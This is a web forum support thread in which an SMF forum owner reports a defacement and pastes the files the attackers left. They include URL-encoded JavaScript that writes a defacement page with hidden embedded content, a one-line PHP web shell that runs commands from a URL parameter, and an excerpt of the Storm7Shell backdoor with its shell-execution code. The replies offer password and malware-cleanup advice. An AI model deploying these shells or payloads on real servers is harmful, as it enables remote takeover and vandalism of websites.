hack injection index.html

[Am']

Hello,

my forum has just been hacking away 2 times today, my FTP contains only smf (2rc3)

Hackers have managed to inject an index.html page in the FTP root and also in the root of smf:



antoher code :

Code Select Expand


<Script Language='Javascript'>

<!-- -->

<!--

document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%4A%61%76%61%53%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%0A%76%61%72%20%6C%65%66%74%3D%22%5B%22%3B%0A%76%61%72%20%72%69%67%68%74%3D%22%5D%22%3B%0A%76%61%72%20%6D%73%67%3D%22%20%20%21%20%2D%20%3A%3A%20%48%61%63%6B%65%64%20%42%79%20%53%61%46%31%20%3A%3A%20%2D%20%21%20%2D%20%3A%3A%20%53%61%46%31%20%4F%77%6E%7A%20%59%6F%75%72%20%53%65%63%75%72%69%74%79%20%3A%3A%20%2D%22%3B%0A%76%61%72%20%73%70%65%65%64%3D%32%30%30%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%73%63%72%6F%6C%6C%5F%74%69%74%6C%65%28%29%20%7B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%74%69%74%6C%65%3D%6C%65%66%74%2B%6D%73%67%2B%72%69%67%68%74%3B%0A%20%20%20%20%20%20%20%20%6D%73%67%3D%6D%73%67%2E%73%75%62%73%74%72%69%6E%67%28%31%2C%6D%73%67%2E%6C%65%6E%67%74%68%29%2B%6D%73%67%2E%63%68%61%72%41%74%28%30%29%3B%0A%20%20%20%20%20%20%20%20%73%65%74%54%69%6D%65%6F%75%74%28%22%73%63%72%6F%6C%6C%5F%74%69%74%6C%65%28%29%22%2C%73%70%65%65%64%29%3B%0A%7D%0A%73%63%72%6F%6C%6C%5F%74%69%74%6C%65%28%29%3B%0A%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%62%67%63%6F%6C%6F%72%3D%23%30%30%30%30%30%30%3E%0A%3C%63%65%6E%74%65%72%3E%0A%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%65%62%2E%69%6D%67%2E%76%34%2E%73%6B%79%72%6F%63%6B%2E%6E%65%74%2F%65%62%62%2F%6D%69%7A%6F%2D%77%69%6E%30%35%2F%70%69%63%73%2F%32%31%39%37%31%32%38%32%39%37%5F%36%2E%6A%70%67%27%3E%3C%62%72%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%66%66%30%30%30%30%22%3E%44%69%6D%61%44%69%6D%61%57%79%64%61%64%3C%2F%46%4F%4E%54%3E%0A%3C%64%69%76%20%69%64%3D%22%6D%69%6E%69%50%6C%61%79%65%72%22%3E%3C%65%6D%62%65%64%20%74%79%70%65%3D%22%61%70%70%6C%69%63%61%74%69%6F%6E%2F%78%2D%73%68%6F%63%6B%77%61%76%65%2D%66%6C%61%73%68%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%72%6F%63%7A%69%6B%2E%63%6F%6D%2F%6C%65%63%74%65%75%72%2E%73%77%66%22%20%73%74%79%6C%65%3D%22%22%20%69%64%3D%22%6D%61%72%6F%63%7A%69%6B%50%6C%61%79%65%72%22%20%6E%61%6D%65%3D%22%6D%61%72%6F%63%7A%69%6B%50%6C%61%79%65%72%22%20%62%67%63%6F%6C%6F%72%3D%22%23%66%66%66%66%22%20%71%75%61%6C%69%74%79%3D%22%68%69%67%68%22%20%77%6D%6F%64%65%3D%22%74%72%61%6E%73%70%61%72%65%6E%74%22%20%66%6C%61%73%68%76%61%72%73%3D%22%63%68%65%6D%69%6E%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%72%6F%63%7A%69%6B%2E%63%6F%6D%2F%69%6E%64%65%78%2E%70%68%70%2F%70%6C%61%79%6C%69%73%74%73%2F%61%72%74%69%73%74%5F%70%6C%61%79%6C%69%73%74%2F%39%36%22%20%68%65%69%67%68%74%3D%22%30%22%20%77%69%64%74%68%3D%22%30%22%3E%3C%2F%64%69%76%3E%0A%3C%2F%68%74%6D%6C%3E%0A'));

//-->

</Script>


I contacted my host told me that he may just be the straw smf, a script may be stored in the database or a directory ....

what to do please? is really urgent

until I changed the directory of the forum and I put a maintenance page in html

thank you

[busterone]

First, I would change your login password for your hosting control panel, your ftp password and your SMF administrative password. I would also make sure that the computer you use to access your webspace, ftp, and forum is malware free. Check for trojans/keyloggers. 

Are you the only one with administrative access, or does anyone else also have control panel/ftp access ?

[Am']

searching in the ftp, I found this:

themes/default/css/index.php :

Code Select Expand


<?php
system ($_GET[cmd]); 
?>

and another file, stor.php (546ko) :

Code Select Expand

<?php



/******************************************************************************************

*  Storm7Shell, a modded Locus7Shell, which is a: $count=0; while($count==0){ echo ' mod of a'; }

*

*  VERSION 2 ******!!!!

*

*  By sToRm - the 15-year-old hacker :)

*

*  Greetz to all my friends in #lobby

*

*  A big, fat "****** you" to:

*   - HellBound Hackers (you're also part of the next on the list, except you can't even deface!)

*   - people who deface because they can't root and think they're 1337

*   - idiots who add mail() to their shells so they can log your ownages

*   - idiots who add mail() to their shells so they can log your ownages and mess up the variables so it doesn't even work!

*   - MPAA, RIAA, and all those other arse-hole anti-p2p organizations

* 

*  lack of money and parental freedom leaves me with no site to advertise xD

*

*

*  Newer Mods (added by me) for v2 --

+--------------------------------------------------------+

*  fixed a bug where deleting something from a path that has a space in it would return you to an invalid dir

*  fixed the *nix aliases where the cmds were in the name and the names were executed :S

*  added md5/sha1 file checksums

*  removed fgdump (no need for three programs that do the same f-ing thing :P) !!! 1 mb saved !!!

*  

*

*  Old Mods (added by me) for v1 --

+--------------------------------------------------------+

*  added the trojan executer

*  cleaned up the interface in general

*  added windows login hash grabber + sam/fg/pwdump2

*  added mass code injector (thanks SubSyn)

*  added pre-compiled h00ly****** and raptor_chown

*  added log cleaners for both *nix and windows

*  removed all the ******ty/non-working functions in the drop-down boxes

*  fixed the google kernel thing (the search variables were fuxxed up)

*  made the dir listing easier to read with the alternating bgcolors

*  little optimizations in code here and there (i'm an optimization whore tbh)

*  submit md5/sha1 hash to cracking sites

*  made that awesome logo ;)

*  added the disabled php functions thing (took from r57shell)

*  added better windows/*nix-specific aliases

*  cleaned up the safe-mode bypass functions (wow, some of the ******tiest code i've ever seen o_O )

*  wordlist md5/sha1 cracker

*

*  What I Plan to Do Next --

+--------------------------------------------------------+

*  smaller size (somehow) :S

*  more sploits

*  allow input for dir to unpack exploits to

*  better trojans/backdoors

*  more functions/aliases

*  maybe move stuff around/change theme

*  make the php picture in the dir listing white for easier readability

*  take a first look at the sql section o.O

*  remove:

*   - more of those stupid spaces after every line

*   - more " and change them to ' for faster execution

*   - a bunch of other stupid code things (example:  echo("$msg");  (wtf... :S))

*********************************************************/



//milw0rm search

$Lversion = php_uname(r);

$OSV = php_uname(s);

if(eregi('Linux',$OSV))

{

$Lversion=substr($Lversion,0,6);

$millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;

}else{

$Lversion=substr($Lversion,0,3);

$millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;

}

//End of milw0rm search





//w4ck1ng Shell

if (!function_exists('myshellexec'))

{

if(is_callable("popen")){

function myshellexec($command) {

if (!($p=popen("($command)2>&1","r"))) {

return 126;

}

while (!feof($p)) {

$line=fgets($p,1000);

$out .= $line;

}

pclose($p);

return $out;

}

}else{

function myshellexec($cmd)

{

 global $disablefunc;

 $result = '';

 if (!empty($cmd))

 {

  if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}

  elseif (($result = `$cmd`) !== FALSE) {}

  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_resource($fp = popen($cmd,"r")))

  {

   $result = '';

   while(!feof($fp)) {$result .= fread($fp,1024);}

   pclose($fp);

  }

 }

 return $result;

}

}

}

......


What is it? how they have succeeded to put it in my ftp?

in the stor file, they talk about linux, mail... it means what it?

[CapadY]

third: SMF don't have a index.html page at all. It uses index.php

[stog]

an html part is added above the php in index.php